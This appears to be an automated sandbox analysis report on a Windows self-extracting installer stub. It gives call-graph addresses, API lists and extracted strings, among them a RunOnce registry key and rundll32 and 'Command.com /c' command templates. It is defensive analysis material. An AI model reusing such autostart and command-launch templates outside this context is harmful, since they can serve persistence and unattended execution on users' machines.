RemoveDirectoryA 2679->2681 2680 7ff761f76682 2680->2661 2681->2661 2682->2485 2684 7ff761f724a6 2683->2684 2685 7ff761f724c4 2683->2685 2686 7ff761f74dcc 24 API calls 2684->2686 2687 7ff761f78470 7 API calls 2685->2687 2686->2685 2688 7ff761f724df 2687->2688 2688->2506 2688->2508 2691 7ff761f763e3 2689->2691 2692 7ff761f77ba8 CharPrevA 2691->2692 2695 7ff761f7644b GetTempFileNameA 2691->2695 2713 7ff761f7114c 2691->2713 2693 7ff761f76420 RemoveDirectoryA GetFileAttributesA 2692->2693 2693->2691 2694 7ff761f764b6 CreateDirectoryA 2693->2694 2694->2695 2696 7ff761f76490 2694->2696 2695->2696 2697 7ff761f7646b DeleteFileA CreateDirectoryA 2695->2697 2698 7ff761f78470 7 API calls 2696->2698 2697->2696 2699 7ff761f764a2 2698->2699 2699->2661 2699->2667 2699->2668 2701 7ff761f76b8b 2700->2701 2701->2701 2702 7ff761f76b94 LocalAlloc 2701->2702 2703 7ff761f76bf5 2702->2703 2704 7ff761f76bb4 2702->2704 2707 7ff761f77ba8 CharPrevA 2703->2707 2705 7ff761f74dcc 24 API calls 2704->2705 2706 7ff761f76bd2 2705->2706 2711 7ff761f76626 2706->2711 2716 7ff761f77700 GetLastError 2706->2716 2709 7ff761f76c14 CreateFileA LocalFree 2707->2709 2709->2706 2710 7ff761f76c61 CloseHandle GetFileAttributesA 2709->2710 2710->2706 2711->2670 2711->2671 2712->2680 2714 7ff761f71178 _vsnprintf 2713->2714 2715 7ff761f71199 2713->2715 2714->2715 2715->2691 2716->2711 2717->2532 2718->2537 2720 7ff761f72525 2719->2720 2721 7ff761f72562 2719->2721 2724 7ff761f7114c _vsnprintf 2720->2724 2722 7ff761f725ab 2721->2722 2723 7ff761f72567 2721->2723 2726 7ff761f7255d 2722->2726 2731 7ff761f7114c _vsnprintf 2722->2731 2725 7ff761f7114c _vsnprintf 2723->2725 2727 7ff761f7253d 2724->2727 2730 7ff761f7257f 2725->2730 2728 7ff761f78470 7 API calls 2726->2728 2729 7ff761f74dcc 24 API calls 2727->2729 2732 7ff761f72609 2728->2732 2729->2726 2733 7ff761f74dcc 24 API calls 2730->2733 2734 7ff761f725c7 2731->2734 2732->2535 2733->2726 2735 7ff761f74dcc 24 API calls 2734->2735 2735->2726 2736->2529 2738 7ff761f75ced 
2737->2738 2748 7ff761f75d62 2737->2748 2749 7ff761f75380 2738->2749 2740 7ff761f78470 7 API calls 2742 7ff761f75d78 2740->2742 2742->2554 2742->2555 2743 7ff761f75d0d #21 2744 7ff761f75d28 2743->2744 2743->2748 2744->2748 2761 7ff761f75770 2744->2761 2747 7ff761f75d4f #23 2747->2748 2748->2740 2750 7ff761f753b3 2749->2750 2751 7ff761f753fd lstrcmpA 2750->2751 2752 7ff761f753d0 2750->2752 2754 7ff761f753f4 2751->2754 2755 7ff761f75454 2751->2755 2753 7ff761f74dcc 24 API calls 2752->2753 2753->2754 2754->2743 2754->2748 2755->2754 2756 7ff761f754a8 CreateFileA 2755->2756 2756->2754 2758 7ff761f754de 2756->2758 2757 7ff761f75561 CreateFileA 2757->2754 2758->2754 2758->2757 2759 7ff761f75549 CharNextA 2758->2759 2760 7ff761f75532 CreateDirectoryA 2758->2760 2759->2758 2760->2759 2762 7ff761f757a4 CloseHandle 2761->2762 2763 7ff761f7578f 2761->2763 2762->2763 2763->2747 2763->2748 2765 7ff761f716d3 2764->2765 2856 7ff761f715e8 2765->2856 2768 7ff761f77ba8 CharPrevA 2769 7ff761f71766 2768->2769 2770 7ff761f77d68 2 API calls 2769->2770 2771 7ff761f71811 2770->2771 2772 7ff761f71a1b 2771->2772 2773 7ff761f7181a CompareStringA 2771->2773 2775 7ff761f77d68 2 API calls 2772->2775 2773->2772 2774 7ff761f7184d GetFileAttributesA 2773->2774 2776 7ff761f71867 2774->2776 2777 7ff761f719f3 2774->2777 2778 7ff761f71a28 2775->2778 2776->2777 2781 7ff761f715e8 2 API calls 2776->2781 2782 7ff761f74dcc 24 API calls 2777->2782 2779 7ff761f71acb LocalAlloc 2778->2779 2780 7ff761f71a31 CompareStringA 2778->2780 2779->2777 2783 7ff761f71aeb GetFileAttributesA 2779->2783 2780->2779 2787 7ff761f71a60 2780->2787 2784 7ff761f7188b 2781->2784 2801 7ff761f7194f 2782->2801 2785 7ff761f71b01 2783->2785 2786 7ff761f718b5 LocalAlloc 2784->2786 2788 7ff761f715e8 2 API calls 2784->2788 2802 7ff761f71b54 2785->2802 2786->2777 2789 7ff761f718d7 GetPrivateProfileIntA GetPrivateProfileStringA 2786->2789 2787->2787 2791 7ff761f71a81 LocalAlloc 2787->2791 2788->2786 2792 7ff761f71984 2789->2792 2789->2801 
2790 7ff761f78470 7 API calls 2793 7ff761f71be9 2790->2793 2791->2777 2796 7ff761f71ab2 2791->2796 2794 7ff761f719ba 2792->2794 2795 7ff761f71995 GetShortPathNameA 2792->2795 2793->2586 2800 7ff761f7114c _vsnprintf 2794->2800 2795->2794 2798 7ff761f7114c _vsnprintf 2796->2798 2798->2801 2799 7ff761f71bd1 2799->2790 2800->2801 2801->2799 2864 7ff761f72a6c 2802->2864 2804 7ff761f71dce 2803->2804 2805 7ff761f72019 2803->2805 2808 7ff761f7114c _vsnprintf 2804->2808 2810 7ff761f71e25 2804->2810 2806 7ff761f78470 7 API calls 2805->2806 2807 7ff761f72028 2806->2807 2807->2586 2809 7ff761f71dee RegQueryValueExA 2808->2809 2809->2804 2809->2810 2811 7ff761f71e29 RegCloseKey 2810->2811 2812 7ff761f71e46 GetSystemDirectoryA 2810->2812 2811->2805 2813 7ff761f77ba8 CharPrevA 2812->2813 2814 7ff761f71e6a LoadLibraryA 2813->2814 2815 7ff761f71f55 GetModuleFileNameA 2814->2815 2816 7ff761f71e86 GetProcAddress FreeLibrary 2814->2816 2818 7ff761f71f78 RegCloseKey 2815->2818 2821 7ff761f71ee8 2815->2821 2816->2815 2817 7ff761f71ebe GetSystemDirectoryA 2816->2817 2819 7ff761f71ed5 2817->2819 2817->2821 2818->2805 2820 7ff761f77ba8 CharPrevA 2819->2820 2820->2821 2821->2821 2822 7ff761f71f11 LocalAlloc 2821->2822 2823 7ff761f71f8e 2822->2823 2824 7ff761f71f35 2822->2824 2826 7ff761f7114c _vsnprintf 2823->2826 2825 7ff761f74dcc 24 API calls 2824->2825 2827 7ff761f71f53 2825->2827 2828 7ff761f71fc4 2826->2828 2827->2818 2828->2828 2829 7ff761f71fcd RegSetValueExA RegCloseKey LocalFree 2828->2829 2829->2805 2831 7ff761f748b3 2830->2831 2832 7ff761f747c2 WaitForSingleObject GetExitCodeProcess 2830->2832 2891 7ff761f77700 GetLastError 2831->2891 2833 7ff761f747f9 2832->2833 2839 7ff761f72318 18 API calls 2833->2839 2844 7ff761f7482a CloseHandle CloseHandle 2833->2844 2835 7ff761f748b8 GetLastError FormatMessageA 2836 7ff761f74dcc 24 API calls 2835->2836 2838 7ff761f7491c 2836->2838 2841 7ff761f78470 7 API calls 2838->2841 2842 7ff761f7484d 2839->2842 2840 7ff761f748aa 2840->2838 2843 
7ff761f7492f 2841->2843 2842->2844 2843->2586 2844->2838 2844->2840 2846 7ff761f77a25 2845->2846 2847 7ff761f77ba8 CharPrevA 2846->2847 2848 7ff761f77a63 GetFileAttributesA 2847->2848 2849 7ff761f77a79 2848->2849 2850 7ff761f77a96 LoadLibraryA 2848->2850 2849->2850 2851 7ff761f77a7d LoadLibraryExA 2849->2851 2852 7ff761f77aa9 2850->2852 2851->2852 2853 7ff761f78470 7 API calls 2852->2853 2854 7ff761f77ab9 2853->2854 2854->2592 2855->2611 2857 7ff761f71609 2856->2857 2859 7ff761f71621 2857->2859 2860 7ff761f71651 2857->2860 2877 7ff761f77ce8 2857->2877 2861 7ff761f77ce8 2 API calls 2859->2861 2860->2768 2860->2769 2862 7ff761f7162f 2861->2862 2862->2860 2863 7ff761f77ce8 2 API calls 2862->2863 2863->2862 2865 7ff761f72c24 2864->2865 2866 7ff761f72aa0 GetModuleFileNameA 2864->2866 2867 7ff761f78470 7 API calls 2865->2867 2866->2865 2868 7ff761f72ac8 2866->2868 2870 7ff761f72c37 2867->2870 2869 7ff761f72acc IsDBCSLeadByte 2868->2869 2871 7ff761f72bf6 CharNextA 2868->2871 2872 7ff761f72af1 CharNextA CharUpperA 2868->2872 2873 7ff761f72c08 CharNextA 2868->2873 2876 7ff761f72b36 CharPrevA 2868->2876 2882 7ff761f77c40 2868->2882 2869->2868 2870->2799 2871->2873 2872->2868 2874 7ff761f72b9b CharUpperA 2872->2874 2873->2865 2873->2869 2874->2868 2876->2868 2879 7ff761f77d00 2877->2879 2878 7ff761f77d47 2878->2857 2879->2878 2880 7ff761f77d0a IsDBCSLeadByte 2879->2880 2881 7ff761f77d30 CharNextA 2879->2881 2880->2878 2880->2879 2881->2879 2883 7ff761f77c58 2882->2883 2883->2883 2884 7ff761f77c61 CharPrevA 2883->2884 2885 7ff761f77c7d CharPrevA 2884->2885 2886 7ff761f77c75 2885->2886 2887 7ff761f77c94 2885->2887 2886->2885 2886->2887 2888 7ff761f77cc7 2887->2888 2889 7ff761f77c9e CharPrevA 2887->2889 2890 7ff761f77cb5 CharNextA 2887->2890 2888->2868 2889->2888 2889->2890 2890->2888 2891->2835 2892->2632 2894 7ff761f722eb 2893->2894 2895 7ff761f72281 2893->2895 2897 7ff761f78470 7 API calls 2894->2897 2896 7ff761f77ba8 CharPrevA 2895->2896 2898 7ff761f72294 
WritePrivateProfileStringA _lopen 2896->2898 2899 7ff761f722fd 2897->2899 2898->2894 2900 7ff761f722c7 _llseek _lclose 2898->2900 2899->2225 2900->2894 3000 7ff761f73840 3001 7ff761f7385a 3000->3001 3002 7ff761f73852 3000->3002 3003 7ff761f738ec EndDialog 3001->3003 3006 7ff761f7385f 3001->3006 3002->3001 3004 7ff761f7388e GetDesktopWindow 3002->3004 3003->3006 3005 7ff761f74c68 14 API calls 3004->3005 3007 7ff761f738a5 SetWindowTextA SetDlgItemTextA SetForegroundWindow 3005->3007 3007->3006 3008 7ff761f71500 3009 7ff761f71557 GetDesktopWindow 3008->3009 3010 7ff761f71530 3008->3010 3011 7ff761f74c68 14 API calls 3009->3011 3012 7ff761f71553 3010->3012 3014 7ff761f71542 EndDialog 3010->3014 3013 7ff761f7156e LoadStringA SetDlgItemTextA MessageBeep 3011->3013 3015 7ff761f78470 7 API calls 3012->3015 3013->3012 3014->3012 3016 7ff761f715d0 3015->3016 3019 7ff761f78750 3020 7ff761f78782 3019->3020 3021 7ff761f7875f 3019->3021 3021->3020 3022 7ff761f7877b ?terminate@ 3021->3022 3022->3020 3023 7ff761f78790 SetUnhandledExceptionFilter 2942 7ff761f73910 2943 7ff761f73933 2942->2943 2944 7ff761f73a09 2942->2944 2943->2944 2945 7ff761f73948 2943->2945 2946 7ff761f73a11 GetDesktopWindow 2943->2946 2947 7ff761f73b1a EndDialog 2944->2947 2950 7ff761f73954 2944->2950 2948 7ff761f7397b 2945->2948 2949 7ff761f7394c 2945->2949 2965 7ff761f74c68 6 API calls 2946->2965 2947->2950 2948->2950 2953 7ff761f73985 ResetEvent 2948->2953 2949->2950 2952 7ff761f7395b TerminateThread 2949->2952 2952->2947 2957 7ff761f74dcc 24 API calls 2953->2957 2955 7ff761f73a9b SetWindowTextA CreateThread 2955->2950 2958 7ff761f73ae8 2955->2958 2956 7ff761f73a38 GetDlgItem SendMessageA GetDlgItem SendMessageA 2956->2955 2959 7ff761f739c3 2957->2959 2960 7ff761f74dcc 24 API calls 2958->2960 2961 7ff761f739e4 SetEvent 2959->2961 2963 7ff761f739cc SetEvent 2959->2963 2962 7ff761f73b07 2960->2962 2970 7ff761f73b40 2961->2970 2962->2944 2963->2950 2967 7ff761f74d3f SetWindowPos 2965->2967 2968 7ff761f78470 7 
API calls 2967->2968 2969 7ff761f73a2f 2968->2969 2969->2955 2969->2956 2971 7ff761f73b4c MsgWaitForMultipleObjects 2970->2971 2972 7ff761f73be5 2971->2972 2973 7ff761f73b74 PeekMessageA 2971->2973 2972->2944 2973->2971 2976 7ff761f73b99 2973->2976 2974 7ff761f73ba7 DispatchMessageA 2975 7ff761f73bb8 PeekMessageA 2974->2975 2975->2976 2976->2971 2976->2972 2976->2974 2976->2975 2977 7ff761f75690 2978 7ff761f73b40 4 API calls 2977->2978 2979 7ff761f756b1 2978->2979 2980 7ff761f756c2 WriteFile 2979->2980 2982 7ff761f756ba 2979->2982 2981 7ff761f756f9 2980->2981 2980->2982 2981->2982 2983 7ff761f75725 SendDlgItemMessageA 2981->2983 2983->2982 3100 7ff761f780d0 3101 7ff761f780e2 3100->3101 3107 7ff761f78818 GetModuleHandleW 3101->3107 3103 7ff761f78149 __set_app_type 3104 7ff761f78186 3103->3104 3105 7ff761f7819c 3104->3105 3106 7ff761f7818f __setusermatherr 3104->3106 3106->3105 3108 7ff761f7882d 3107->3108 3108->3103

                                                                                                                      Callgraph


                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                      • String ID: <None>$ADMQCMD$Adv$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup0
                                                                                                                      • API String ID: 2679723528-2275013900
                                                                                                                      • Opcode ID: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                      • Instruction ID: 15f20a37efdab4df4754985a9e1989324969b74790258a945e08fc4ca53c51ba
                                                                                                                      • Opcode Fuzzy Hash: 47eb29a787de270268fb154fbc2d409703058abd89df6d54f7005b929927f1b1
                                                                                                                      • Instruction Fuzzy Hash: 85028D71A0A642C6EB20AF10F8486F9B7A0FB85B54FD41135EA5D43AA4DFBCE545C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
                                                                                                                      • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                                                                                                                      • API String ID: 178549006-3726664654
                                                                                                                      • Opcode ID: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                      • Instruction ID: 9a39f525303486e071f732536010681e1f33905217a97812ae93ae9b56584f31
                                                                                                                      • Opcode Fuzzy Hash: 276e9805d9b7e1d57039d94b06db834f3dbf8df68e4bbb97ed4dd8757e439085
                                                                                                                      • Instruction Fuzzy Hash: 28814D32A09A82C6E710AB21F8586F9F7A1FB89F54F845135EA4E43754DFBCE119C710

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                      • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                      • API String ID: 383838535-3544074861
                                                                                                                      • Opcode ID: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                      • Instruction ID: 63c637876df6fb2511652f20ddfec449fa0725421f4eb0a4fd31cc458176414c
                                                                                                                      • Opcode Fuzzy Hash: 137c5f28b5b86e8721d426d5fc1592b78fb4194462560af86aa0c2ab9f656457
                                                                                                                      • Instruction Fuzzy Hash: 28E18C62A0E682C5EB21AF24B4182FAB7B1FB45B54FD44135EA4D03795DFBDD50AC320

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Free$AttributesDirectoryFileFindLoadLocal$Windows$AllocCreateDialogDiskDriveErrorIndirectLastLockMessageParamPathSizeofSpaceStringTempTypelstrcmpmemcpy_s
                                                                                                                      • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                                                                                                                      • API String ID: 3973824516-2740620654
                                                                                                                      • Opcode ID: 27d35e7384e6713e219a42e7dfd4cde3bd40dee3fa6d05908367947fe1441dc0
                                                                                                                      • Instruction ID: 6d9bf8b7cec8415b8aaed1215963fc163016b199de5b248a6c1d0d69d536285e
                                                                                                                      • Opcode Fuzzy Hash: 27d35e7384e6713e219a42e7dfd4cde3bd40dee3fa6d05908367947fe1441dc0
                                                                                                                      • Instruction Fuzzy Hash: F3D18022A1A682C6FB10AB20B4586FAF7A1FB85F50FD44135FA4E43695DFBDE405C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$FindLoad$CreateEventmemset$CloseErrorFreeHandleLastLockMessageMutexSizeofStringVersionmemcpy_s
                                                                                                                      • String ID: $Adv$EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK
                                                                                                                      • API String ID: 3100096412-78895606
                                                                                                                      • Opcode ID: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                                      • Instruction ID: f2ffc741c5fabbf73c108c32f983e445c056ec055adbd91e1a85139cd19a8568
                                                                                                                      • Opcode Fuzzy Hash: 56b820130d1ad660dfa8e8d0e421b62bbaab1ba59714ea7f7ec2c9c3d28285f9
                                                                                                                      • Instruction Fuzzy Hash: 5D815A21A0A643C6F721BB24B8187F9A7A0BF89F54FC45039F94E426A5DFFCA445C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                      • API String ID: 4237285672-305352358
                                                                                                                      • Opcode ID: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                      • Instruction ID: bfdf6487f714e3c856ec3766d9d130cae43b3720da24cbf19f980ff8a4f6b838
                                                                                                                      • Opcode Fuzzy Hash: 49cd0adaaefc1983ba8fc555e95bfd9e5a633419e36afff043da1f8bde31fc7d
                                                                                                                      • Instruction Fuzzy Hash: C5A17E36A19682C6E720AF20F4486EAFBA5FB89B54F845135FA4D43B54DFBCD409CB10

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                                                                                                                      • String ID: *MEMCAB$CABINET
                                                                                                                      • API String ID: 1305606123-2642027498
                                                                                                                      • Opcode ID: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                                      • Instruction ID: da0beddae8112880e5c544170b55986182bb2afc457544e49a088d2a51362353
                                                                                                                      • Opcode Fuzzy Hash: 167cfbe3481d2c55deda2959b4f60fab9ca519b6d8b495f465010a09c29e0748
                                                                                                                      • Instruction Fuzzy Hash: FF51F431A0AB42C6EB50AB10F8582F9FBA1FB89F55FC49135E94E46664DFBCE005C760

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                                                                                                                      • API String ID: 3010855178-1173327654
                                                                                                                      • Opcode ID: cffcf8a3b76aee679a097a9499c7360123ef4f246d294c3f42600086d58a5e88
                                                                                                                      • Instruction ID: f28fa694be2d6227aa8817ebcbd40db02c3eb72d59cd89d097e35b51ec9cb186
                                                                                                                      • Opcode Fuzzy Hash: cffcf8a3b76aee679a097a9499c7360123ef4f246d294c3f42600086d58a5e88
                                                                                                                      • Instruction Fuzzy Hash: 0571E120A0E643D6FB61FB20B8582F5A7A5AF94F90FD54039F94D822A5DEECE445C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSystemInfo.KERNEL32(?,?,?,?,?,?,0000000A,00007FF761F72CE1), ref: 00007FF761F7657C
                                                                                                                      • CreateDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF761F72CE1), ref: 00007FF761F7662F
                                                                                                                      • RemoveDirectoryA.KERNEL32(?,?,?,?,?,?,0000000A,00007FF761F72CE1), ref: 00007FF761F7666F
                                                                                                                        • Part of subcall function 00007FF761F763B8: RemoveDirectoryA.KERNELBASE(0000000A,00007FF761F72CE1), ref: 00007FF761F76423
                                                                                                                        • Part of subcall function 00007FF761F763B8: GetFileAttributesA.KERNELBASE ref: 00007FF761F76432
                                                                                                                        • Part of subcall function 00007FF761F763B8: GetTempFileNameA.KERNEL32 ref: 00007FF761F7645B
                                                                                                                        • Part of subcall function 00007FF761F763B8: DeleteFileA.KERNEL32 ref: 00007FF761F76473
                                                                                                                        • Part of subcall function 00007FF761F763B8: CreateDirectoryA.KERNEL32 ref: 00007FF761F76484
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1665066113.00007FF761F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF761F70000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1665043956.00007FF761F70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665087469.00007FF761F79000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665104785.00007FF761F7C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                      • Associated: 00000000.00000002.1665131227.00007FF761F7E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_7ff761f70000_3lhrJ4X.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                                                                                                                      • API String ID: 1979080616-3374052426
                                                                                                                      • Opcode ID: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                      • Instruction ID: 06920db111b958f5187ecf0a514d1b795b3ec23d6979a96e72af41dcfe982091
                                                                                                                      • Opcode Fuzzy Hash: 7d4d860df232b0db62657ebb5dc88ca939e84df122defa6df573680caeaa5849
                                                                                                                      • Instruction Fuzzy Hash: 7A517D61A0A683C1FB55AB25B8182F9E7A0AF85F60FD84135F94E46295DFBCE805C720

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
